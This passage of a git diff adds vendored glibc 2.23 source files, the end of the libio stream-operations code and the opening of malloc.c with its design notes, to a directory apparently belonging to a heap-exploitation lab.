+  if (result != EOF)
+    fp->_flags &= ~_IO_EOF_SEEN;
+
+  return result;
+}
+libc_hidden_def (_IO_sputbackc)
+
+int
+_IO_sungetc (_IO_FILE *fp)
+{
+  int result;
+
+  if (fp->_IO_read_ptr > fp->_IO_read_base)
+    {
+      fp->_IO_read_ptr--;
+      result = (unsigned char) *fp->_IO_read_ptr;
+    }
+  else
+    result = _IO_PBACKFAIL (fp, EOF);
+
+  if (result != EOF)
+    fp->_flags &= ~_IO_EOF_SEEN;
+
+  return result;
+}
+
+#if 0 /* Work in progress */
+/* Seems not to be needed.  */
+#if 0
+void
+_IO_set_column (_IO_FILE *fp, int c)
+{
+  if (c == -1)
+    fp->_column = -1;
+  else
+    fp->_column = c - (fp->_IO_write_ptr - fp->_IO_write_base);
+}
+#else
+int
+_IO_set_column (_IO_FILE *fp, int i)
+{
+  fp->_cur_column = i + 1;
+  return 0;
+}
+#endif
+#endif
+
+
+unsigned
+_IO_adjust_column (unsigned start, const char *line, int count)
+{
+  const char *ptr = line + count;
+  while (ptr > line)
+    if (*--ptr == '\n')
+      return line + count - ptr - 1;
+  return start + count;
+}
+libc_hidden_def (_IO_adjust_column)
+
+#if 0
+/* Seems not to be needed. --drepper */
+int
+_IO_get_column (_IO_FILE *fp)
+{
+  if (fp->_cur_column)
+    return _IO_adjust_column (fp->_cur_column - 1,
+			      fp->_IO_write_base,
+			      fp->_IO_write_ptr - fp->_IO_write_base);
+  return -1;
+}
+#endif
+
+
+int
+_IO_flush_all_lockp (int do_lock)
+{
+  int result = 0;
+  struct _IO_FILE *fp;
+  int last_stamp;
+
+#ifdef _IO_MTSAFE_IO
+  __libc_cleanup_region_start (do_lock, flush_cleanup, NULL);
+  if (do_lock)
+    _IO_lock_lock (list_all_lock);
+#endif
+
+  last_stamp = _IO_list_all_stamp;
+  fp = (_IO_FILE *) _IO_list_all;
+  while (fp != NULL)
+    {
+      run_fp = fp;
+      if (do_lock)
+	_IO_flockfile (fp);
+
+      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
+#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
+	   || (_IO_vtable_offset (fp) == 0
+	       && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
+				    > fp->_wide_data->_IO_write_base))
+#endif
+	   )
+	  && _IO_OVERFLOW (fp, EOF) == EOF)
+	result = EOF;
+
+      if (do_lock)
+	_IO_funlockfile (fp);
+      run_fp = NULL;
+
+      if (last_stamp != _IO_list_all_stamp)
+	{
+	  /* Something was added to the list.  Start all over again.  */
+	  fp = (_IO_FILE *) _IO_list_all;
+	  last_stamp = _IO_list_all_stamp;
+	}
+      else
+	fp = fp->_chain;
+    }
+
+#ifdef _IO_MTSAFE_IO
+  if (do_lock)
+    _IO_lock_unlock (list_all_lock);
+  __libc_cleanup_region_end (0);
+#endif
+
+  return result;
+}
+
+
+int
+_IO_flush_all (void)
+{
+  /* We want locking.  */
+  return _IO_flush_all_lockp (1);
+}
+libc_hidden_def (_IO_flush_all)
+
+void
+_IO_flush_all_linebuffered (void)
+{
+  struct _IO_FILE *fp;
+  int last_stamp;
+
+#ifdef _IO_MTSAFE_IO
+  _IO_cleanup_region_start_noarg (flush_cleanup);
+  _IO_lock_lock (list_all_lock);
+#endif
+
+  last_stamp = _IO_list_all_stamp;
+  fp = (_IO_FILE *) _IO_list_all;
+  while (fp != NULL)
+    {
+      run_fp = fp;
+      _IO_flockfile (fp);
+
+      if ((fp->_flags & _IO_NO_WRITES) == 0 && fp->_flags & _IO_LINE_BUF)
+	_IO_OVERFLOW (fp, EOF);
+
+      _IO_funlockfile (fp);
+      run_fp = NULL;
+
+      if (last_stamp != _IO_list_all_stamp)
+	{
+	  /* Something was added to the list.  Start all over again.  */
+	  fp = (_IO_FILE *) _IO_list_all;
+	  last_stamp = _IO_list_all_stamp;
+	}
+      else
+	fp = fp->_chain;
+    }
+
+#ifdef _IO_MTSAFE_IO
+  _IO_lock_unlock (list_all_lock);
+  _IO_cleanup_region_end (0);
+#endif
+}
+libc_hidden_def (_IO_flush_all_linebuffered)
+#ifdef _LIBC
+weak_alias (_IO_flush_all_linebuffered, _flushlbf)
+#endif
+
+
+/* The following is a bit tricky.  In general, we want to unbuffer the
+   streams so that all output which follows is seen.  If we are not
+   looking for memory leaks it does not make much sense to free the
+   actual buffer because this will happen anyway once the program
+   terminated.  If we do want to look for memory leaks we have to free
+   the buffers.  Whether something is freed is determined by the
+   function sin the libc_freeres section.  Those are called as part of
+   the atexit routine, just like _IO_cleanup.  The problem is we do
+   not know whether the freeres code is called first or _IO_cleanup.
+   if the former is the case, we set the DEALLOC_BUFFER variable to
+   true and _IO_unbuffer_all will take care of the rest.  If
+   _IO_unbuffer_all is called first we add the streams to a list
+   which the freeres function later can walk through.  */
+static void _IO_unbuffer_all (void);
+
+static bool dealloc_buffers;
+static _IO_FILE *freeres_list;
+
+static void
+_IO_unbuffer_all (void)
+{
+  struct _IO_FILE *fp;
+  for (fp = (_IO_FILE *) _IO_list_all; fp; fp = fp->_chain)
+    {
+      if (! (fp->_flags & _IO_UNBUFFERED)
+	  /* Iff stream is un-orientated, it wasn't used. */
+	  && fp->_mode != 0)
+	{
+#ifdef _IO_MTSAFE_IO
+	  int cnt;
+#define MAXTRIES 2
+	  for (cnt = 0; cnt < MAXTRIES; ++cnt)
+	    if (fp->_lock == NULL || _IO_lock_trylock (*fp->_lock) == 0)
+	      break;
+	    else
+	      /* Give the other thread time to finish up its use of the
+		 stream.  */
+	      __sched_yield ();
+#endif
+
+	  if (! dealloc_buffers && !(fp->_flags & _IO_USER_BUF))
+	    {
+	      fp->_flags |= _IO_USER_BUF;
+
+	      fp->_freeres_list = freeres_list;
+	      freeres_list = fp;
+	      fp->_freeres_buf = fp->_IO_buf_base;
+	    }
+
+	  _IO_SETBUF (fp, NULL, 0);
+
+	  if (fp->_mode > 0)
+	    _IO_wsetb (fp, NULL, NULL, 0);
+
+#ifdef _IO_MTSAFE_IO
+	  if (cnt < MAXTRIES && fp->_lock != NULL)
+	    _IO_lock_unlock (*fp->_lock);
+#endif
+	}
+
+      /* Make sure that never again the wide char functions can be
+	 used.  */
+      fp->_mode = -1;
+    }
+}
+
+
+libc_freeres_fn (buffer_free)
+{
+  dealloc_buffers = true;
+
+  while (freeres_list != NULL)
+    {
+      free (freeres_list->_freeres_buf);
+
+      freeres_list = freeres_list->_freeres_list;
+    }
+}
+
+
+int
+_IO_cleanup (void)
+{
+  /* We do *not* want locking.  Some threads might use streams but
+     that is their problem, we flush them underneath them.  */
+  int result = _IO_flush_all_lockp (0);
+
+  /* We currently don't have a reliable mechanism for making sure that
+     C++ static destructors are executed in the correct order.
+     So it is possible that other static destructors might want to
+     write to cout - and they're supposed to be able to do so.
+
+     The following will make the standard streambufs be unbuffered,
+     which forces any output from late destructors to be written out. */
+  _IO_unbuffer_all ();
+
+  return result;
+}
+
+
+void
+_IO_init_marker (struct _IO_marker *marker, _IO_FILE *fp)
+{
+  marker->_sbuf = fp;
+  if (_IO_in_put_mode (fp))
+    _IO_switch_to_get_mode (fp);
+  if (_IO_in_backup (fp))
+    marker->_pos = fp->_IO_read_ptr - fp->_IO_read_end;
+  else
+    marker->_pos = fp->_IO_read_ptr - fp->_IO_read_base;
+
+  /* Should perhaps sort the chain? */
+  marker->_next = fp->_markers;
+  fp->_markers = marker;
+}
+
+void
+_IO_remove_marker (struct _IO_marker *marker)
+{
+  /* Unlink from sb's chain. */
+  struct _IO_marker **ptr = &marker->_sbuf->_markers;
+  for (; ; ptr = &(*ptr)->_next)
+    {
+      if (*ptr == NULL)
+	break;
+      else if (*ptr == marker)
+	{
+	  *ptr = marker->_next;
+	  return;
+	}
+    }
+#if 0
+    if _sbuf has a backup area that is no longer needed, should we delete
+    it now, or wait until the next underflow?
+#endif
+}
+
+#define BAD_DELTA EOF
+
+int
+_IO_marker_difference (struct _IO_marker *mark1, struct _IO_marker *mark2)
+{
+  return mark1->_pos - mark2->_pos;
+}
+
+/* Return difference between MARK and current position of MARK's stream. */
+int
+_IO_marker_delta (struct _IO_marker *mark)
+{
+  int cur_pos;
+  if (mark->_sbuf == NULL)
+    return BAD_DELTA;
+  if (_IO_in_backup (mark->_sbuf))
+    cur_pos = mark->_sbuf->_IO_read_ptr - mark->_sbuf->_IO_read_end;
+  else
+    cur_pos = mark->_sbuf->_IO_read_ptr - mark->_sbuf->_IO_read_base;
+  return mark->_pos - cur_pos;
+}
+
+int
+_IO_seekmark (_IO_FILE *fp, struct _IO_marker *mark, int delta)
+{
+  if (mark->_sbuf != fp)
+    return EOF;
+ if (mark->_pos >= 0)
+    {
+      if (_IO_in_backup (fp))
+	_IO_switch_to_main_get_area (fp);
+      fp->_IO_read_ptr = fp->_IO_read_base + mark->_pos;
+    }
+  else
+    {
+      if (!_IO_in_backup (fp))
+	_IO_switch_to_backup_area (fp);
+      fp->_IO_read_ptr = fp->_IO_read_end + mark->_pos;
+    }
+  return 0;
+}
+
+void
+_IO_unsave_markers (_IO_FILE *fp)
+{
+  struct _IO_marker *mark = fp->_markers;
+  if (mark)
+    {
+#ifdef TODO
+      streampos offset = seekoff (0, ios::cur, ios::in);
+      if (offset != EOF)
+	{
+	  offset += eGptr () - Gbase ();
+	  for ( ; mark != NULL; mark = mark->_next)
+	    mark->set_streampos (mark->_pos + offset);
+	}
+    else
+      {
+	for ( ; mark != NULL; mark = mark->_next)
+	  mark->set_streampos (EOF);
+      }
+#endif
+      fp->_markers = 0;
+    }
+
+  if (_IO_have_backup (fp))
+    _IO_free_backup_area (fp);
+}
+libc_hidden_def (_IO_unsave_markers)
+
+#if 0
+/* Seems not to be needed. --drepper */
+int
+_IO_nobackup_pbackfail (_IO_FILE *fp, int c)
+{
+  if (fp->_IO_read_ptr > fp->_IO_read_base)
+	fp->_IO_read_ptr--;
+  if (c != EOF && *fp->_IO_read_ptr != c)
+      *fp->_IO_read_ptr = c;
+  return (unsigned char) c;
+}
+#endif
+
+int
+_IO_default_pbackfail (_IO_FILE *fp, int c)
+{
+  if (fp->_IO_read_ptr > fp->_IO_read_base && !_IO_in_backup (fp)
+      && (unsigned char) fp->_IO_read_ptr[-1] == c)
+    --fp->_IO_read_ptr;
+  else
+    {
+      /* Need to handle a filebuf in write mode (switch to read mode). FIXME!*/
+      if (!_IO_in_backup (fp))
+	{
+	  /* We need to keep the invariant that the main get area
+	     logically follows the backup area.  */
+	  if (fp->_IO_read_ptr > fp->_IO_read_base && _IO_have_backup (fp))
+	    {
+	      if (save_for_backup (fp, fp->_IO_read_ptr))
+		return EOF;
+	    }
+	  else if (!_IO_have_backup (fp))
+	    {
+	      /* No backup buffer: allocate one. */
+	      /* Use nshort buffer, if unused? (probably not)  FIXME */
+	      int backup_size = 128;
+	      char *bbuf = (char *) malloc (backup_size);
+	      if (bbuf == NULL)
+		return EOF;
+	      fp->_IO_save_base = bbuf;
+	      fp->_IO_save_end = fp->_IO_save_base + backup_size;
+	      fp->_IO_backup_base = fp->_IO_save_end;
+	    }
+	  fp->_IO_read_base = fp->_IO_read_ptr;
+	  _IO_switch_to_backup_area (fp);
+	}
+      else if (fp->_IO_read_ptr <= fp->_IO_read_base)
+	{
+	  /* Increase size of existing backup buffer. */
+	  _IO_size_t new_size;
+	  _IO_size_t old_size = fp->_IO_read_end - fp->_IO_read_base;
+	  char *new_buf;
+	  new_size = 2 * old_size;
+	  new_buf = (char *) malloc (new_size);
+	  if (new_buf == NULL)
+	    return EOF;
+	  memcpy (new_buf + (new_size - old_size), fp->_IO_read_base,
+		  old_size);
+	  free (fp->_IO_read_base);
+	  _IO_setg (fp, new_buf, new_buf + (new_size - old_size),
+		    new_buf + new_size);
+	  fp->_IO_backup_base = fp->_IO_read_ptr;
+	}
+
+      *--fp->_IO_read_ptr = c;
+    }
+  return (unsigned char) c;
+}
+libc_hidden_def (_IO_default_pbackfail)
+
+_IO_off64_t
+_IO_default_seek (_IO_FILE *fp, _IO_off64_t offset, int dir)
+{
+  return _IO_pos_BAD;
+}
+
+int
+_IO_default_stat (_IO_FILE *fp, void *st)
+{
+  return EOF;
+}
+
+_IO_ssize_t
+_IO_default_read (_IO_FILE *fp, void *data, _IO_ssize_t n)
+{
+  return -1;
+}
+
+_IO_ssize_t
+_IO_default_write (_IO_FILE *fp, const void *data, _IO_ssize_t n)
+{
+  return 0;
+}
+
+int
+_IO_default_showmanyc (_IO_FILE *fp)
+{
+  return -1;
+}
+
+void
+_IO_default_imbue (_IO_FILE *fp, void *locale)
+{
+}
+
+_IO_ITER
+_IO_iter_begin (void)
+{
+  return (_IO_ITER) _IO_list_all;
+}
+libc_hidden_def (_IO_iter_begin)
+
+_IO_ITER
+_IO_iter_end (void)
+{
+  return NULL;
+}
+libc_hidden_def (_IO_iter_end)
+
+_IO_ITER
+_IO_iter_next (_IO_ITER iter)
+{
+  return iter->_chain;
+}
+libc_hidden_def (_IO_iter_next)
+
+_IO_FILE *
+_IO_iter_file (_IO_ITER iter)
+{
+  return iter;
+}
+libc_hidden_def (_IO_iter_file)
+
+void
+_IO_list_lock (void)
+{
+#ifdef _IO_MTSAFE_IO
+  _IO_lock_lock (list_all_lock);
+#endif
+}
+libc_hidden_def (_IO_list_lock)
+
+void
+_IO_list_unlock (void)
+{
+#ifdef _IO_MTSAFE_IO
+  _IO_lock_unlock (list_all_lock);
+#endif
+}
+libc_hidden_def (_IO_list_unlock)
+
+void
+_IO_list_resetlock (void)
+{
+#ifdef _IO_MTSAFE_IO
+  _IO_lock_init (list_all_lock);
+#endif
+}
+libc_hidden_def (_IO_list_resetlock)
+
+
+#ifdef TODO
+#if defined(linux)
+#define IO_CLEANUP ;
+#endif
+
+#ifdef IO_CLEANUP
+  IO_CLEANUP
+#else
+struct __io_defs {
+    __io_defs() { }
+    ~__io_defs() { _IO_cleanup (); }
+};
+__io_defs io_defs__;
+#endif
+
+#endif /* TODO */
+
+#ifdef text_set_element
+text_set_element(__libc_atexit, _IO_cleanup);
+#endif
diff --git a/HeapLAB/.glibc/glibc_2.23/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.23/malloc/malloc.c
new file mode 100644
index 0000000..d20d595
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.23/malloc/malloc.c
@@ -0,0 +1,5249 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2016 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    cfree(void* p);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       also fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+    MALLOC_ALIGNMENT           MAX (2 * sizeof(INTERNAL_SIZE_T),
+				    __alignof__ (long double))
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <malloc-machine.h>
+#include <malloc-sysdep.h>
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-internal.h>
+
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summmaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifdef NDEBUG
+# define assert(expr) ((void) 0)
+#else
+# define assert(expr) \
+  ((expr)								      \
+   ? ((void) 0)								      \
+   : __malloc_assert (#expr, __FILE__, __LINE__, __func__))
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+
+/*
+  INTERNAL_SIZE_T is the word-size used for internal bookkeeping
+  of chunk sizes.
+
+  The default version is the same as size_t.
+
+  While not strictly necessary, it is best to define this as an
+  unsigned type, even if size_t is a signed type. This may avoid some
+  artificial size limitations on some systems.
+
+  On a 64-bit machine, you may be able to reduce malloc overhead by
+  defining INTERNAL_SIZE_T to be a 32 bit `unsigned int' at the
+  expense of not being able to handle more than 2^32 of malloced
+  space. If this limitation is acceptable, you are encouraged to set
+  this unless you are on a platform requiring 16byte alignments. In
+  this case the alignment requirements turn out to negate any
+  potential advantages of decreasing size_t word size.
+
+  Implementors: Beware of the possible combinations of:
+     - INTERNAL_SIZE_T might be signed or unsigned, might be 32 or 64 bits,
+       and might be the same width as int or as long
+     - size_t might have different width and signedness as INTERNAL_SIZE_T
+     - int and long might be 32 or 64 bits, and might be the same width
+  To deal with this, most comparisons and difference computations
+  among INTERNAL_SIZE_Ts should cast them to unsigned long, being
+  aware of the fact that casting an unsigned int to a wider long does
+  not sign-extend. (This also makes checking for negative numbers
+  awkward.) Some of these casts result in harmless compiler warnings
+  on some systems.
+*/
+
+#ifndef INTERNAL_SIZE_T
+#define INTERNAL_SIZE_T size_t
+#endif
+
+/* The corresponding word size */
+#define SIZE_SZ                (sizeof(INTERNAL_SIZE_T))
+
+
+/*
+  MALLOC_ALIGNMENT is the minimum alignment for malloc'ed chunks.
+  It must be a power of two at least 2 * SIZE_SZ, even on machines
+  for which smaller alignments would suffice. It may be defined as
+  larger than this though. Note however that code and data structures
+  are optimized for the case of 8-byte alignment.
+*/
+
+
+#ifndef MALLOC_ALIGNMENT
+# if !SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_16)
+/* This is the correct definition when there is no past ABI to constrain it.
+
+   Among configurations with a past ABI constraint, it differs from
+   2*SIZE_SZ only on powerpc32.  For the time being, changing this is
+   causing more compatibility problems due to malloc_get_state and
+   malloc_set_state than will returning blocks not adequately aligned for
+   long double objects under -mlong-double-128.  */
+
+#  define MALLOC_ALIGNMENT       (2 *SIZE_SZ < __alignof__ (long double)      \
+                                  ? __alignof__ (long double) : 2 *SIZE_SZ)
+# else
+#  define MALLOC_ALIGNMENT       (2 *SIZE_SZ)
+# endif
+#endif
+
+/* The corresponding bit mask value */
+#define MALLOC_ALIGN_MASK      (MALLOC_ALIGNMENT - 1)
+
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
